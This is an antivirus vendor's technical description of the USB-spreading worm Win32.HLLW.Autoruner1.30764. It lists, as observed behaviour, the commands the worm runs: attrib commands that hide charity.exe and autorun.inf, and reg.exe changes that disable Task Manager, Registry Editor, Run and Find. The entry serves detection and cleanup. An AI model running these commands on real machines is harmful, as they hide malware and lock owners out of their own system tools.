Para el funcionamiento correcto del sitio web, debe activar el soporte de JavaScript en su navegador.
Win32.HLLW.Autoruner1.30764
Added to the Dr.Web virus database:
2012-11-28
Virus description added:
2012-11-28
Technical Information
To ensure autorun and distribution:
Creates the following files on removable media:
<Drive name for removable media>:\autorun.inf
Malicious functions:
To complicate detection of its presence in the operating system,
forces the system hide from view:
blocks execution of the following system utilities:
Windows Task Manager (Taskmgr)
Registry Editor (RegEdit)
Executes the following:
<SYSTEM32>\attrib.exe +s +a +h +r F:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r G:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r H:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r E:\charity.exe
<SYSTEM32>\rundll32.exe shell32.dll,Activate_RunDLL
<SYSTEM32>\attrib.exe +s +a +h +r C:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r <Drive name for removable media>:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r I:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r G:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r H:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r I:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r F:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r C:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r <Drive name for removable media>:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r E:\autorun.inf
<SYSTEM32>\reg.exe add "HKCR\Folder\shell\explore" /v "" /t reg_sz /d "Charity Virus" /f
<SYSTEM32>\reg.exe add "HKCR\Folder\shell\open" /v "" /t reg_sz /d "Spread me" /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Control Panel\International" /v "s2359" /t reg_sz /d "madforelmo" /f
<SYSTEM32>\cmd.exe /c ""%TEMP%\actmovie.bat" > NUL"
<SYSTEM32>\reg.exe add "HKCU\Control Panel\International" /v "sTimeFormat" /t reg_sz /d "h:mm:ss tt" /f
<SYSTEM32>\reg.exe add "HKCU\Control Panel\International" /v "s1159" /t reg_sz /d "SpreadMe" /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t reg_dword /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t reg_dword /d 0 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t reg_dword /d 0 /f
<SYSTEM32>\label.exe c: charityvir
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDriveTypeAutoRun /t REG_DWORD /d 128 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
Modifies settings of Windows Explorer:
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
Modifies file system :
Creates the following files:
C:\autorun.inf
<SYSTEM32>\autorun.inf
%TEMP%\actmovie.bat
Sets the 'hidden' attribute to the following files:
<Drive name for removable media>:\autorun.inf
C:\autorun.inf
Descargue Dr.Web para Android
Gratis por 3 meses
Todos los componentes de protección
Renovación de la demo a través de AppGallery/Google Pay
Si Vd. continúa usando este sitio web, esto significa que Vd. acepta el uso de archivos Cookie y otras tecnologías para que recabemos las estadísticas sobre los visitantes. Más información
OK